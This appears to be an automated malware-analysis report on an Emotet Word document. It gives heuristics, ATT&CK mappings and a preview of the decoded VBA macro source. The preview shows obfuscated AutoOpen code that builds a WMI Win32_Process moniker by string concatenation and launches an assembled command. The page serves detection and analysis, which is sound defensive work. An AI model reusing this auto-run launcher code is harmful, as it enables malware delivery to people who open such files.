MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
This document contains VBA macros that trigger an AutoOpen event, which in turn uses GetObject and CreateObject to launch the Win32_Process WMI class. This is a common technique used by Emotet to download and execute a second-stage payload. The ClamAV detection name further supports the Emotet family attribution.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6964648-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6964648-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5344 bytes |
SHA-256: 867414fa100558e22beda31c37c10be63c1b8caa0c619b6376265b8c31ecd394 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "B3706351"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "z048260"
Attribute VB_Base = "0{E1349350-99E0-4A72-90F3-1977DB684D66}{83EDA91E-4E8B-4958-96BB-65346C640174}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "T_3475"
Attribute VB_Name = "N425_1"
Attribute VB_Name = "m9153981"
Attribute VB_Name = "l39074"
Attribute VB_Name = "E93758_"
Attribute VB_Name = "X405633"
Attribute VB_Name = "i60_461"
Attribute VB_Name = "G62861"
Attribute VB_Base = "0{AF74C80E-C402-4FA3-81E2-EEA631A2F93F}{1514659B-70B5-477D-B805-1A050E82944F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Z2393_"
Function T313604(V57233)
While d4_266 And J16354
'z696250v975399p299_59o459698
Wend
While z885444 And Z_27110
'd0_39805k43589U04460A7_668
Wend
While Y71482 And H287173
'I4_48352u8199_4C155_7M69290
Wend
Set T313604 = CVar(V57233)
While f502_959 And q6930442
'r156004J20601_J36_771z01_2281
Wend
While V38472 And c747186
'i038_561j_9610_j497446f422_91
Wend
While F68976 And O68689
'p85__6B979313k37996N10_97_8
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While h71155 And K5035_80
'q48757P_5_158Q7370561C8_1038
Wend
While K30223 And I922281
'u1622_56Y929527u016842a9305245
Wend
While D51806 And z792_21
'z963_936G6_1264R7239326Q859462
Wend
Call h10843
While b547092 And D662343
'G838632O_72536o4_1105z684407
Wend
While v__46876 And z8_515
'M40915f935599q7798_35C34593
Wend
While E130647 And W_821753
'r7_48971j366413R828981D8159200
Wend
End Sub
Attribute VB_Name = "D_35423"
Function h10843()
On Error Resume Next
While v4_7621 And z6774422
'R_297_3Y1710874d9730264f945065
Wend
While w0_87_67 And M00305
'i6_286p89864R00162J904590
Wend
While V031241 And H357_2
's0575_11c76_1775H263_870n772534
Wend
u203158 = z048260.m93057.ControlTipText + G62861.G482_58_ + z048260.m93057.PasswordChar + G62861.k547868_ + z048260.m93057.PasswordChar + z048260.m93057 + G62861.S16_30 + z048260.m93057.ControlTipText + z048260.m93057.ControlTipText + G62861.M265494 + z048260.m93057.PasswordChar + G62861.W97271 + z048260.m93057.PasswordChar
While J548_363 And Q847621
'j3548067d1190112u7038894F51718
Wend
While U775866 And o23455_
'z898733k6198_A107727p893892
Wend
Set i30816_4 = T313604(GetObject("winmgmt" _
+ "s:Wi" + "n3" _
+ "2_Pr" _
+ "ocess"))
While j57423 And S519_20
'Y09__03v53282s6776_o8_036
Wend
While K266436 And W406_692
'n449083Z21178X87_7_f85259
Wend
While v79296 And p00_533
'I03411_7h40533_9Q79327Y_7129
Wend
i30816_4.Create D304702 + u203158 + O054302, W95258, V890227, z9_881
While J3230211 And i37_1524
'w__699j83243C9251_T365411
Wend
While b05_7002 And b1641_8
'G51404E22__2Y_2052z5_5123_
Wend
While f8957_3 And C_49838
'D17_23S12546H8799818z830_433
Wend
End Function
Attribute VB_Name = "i677857"
Public Function V890227()
While o2_99_ And U10188
'i40_091A8903746t076_580p688793
Wend
While B62443 And F2670696
'V83778i49_43l5465_71p11_2350
Wend
While L336862 And i93_65_5
'p8554363V601_897m30_9324m0641899
Wend
Set V890227 = T313604(GetObject("winmgm
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.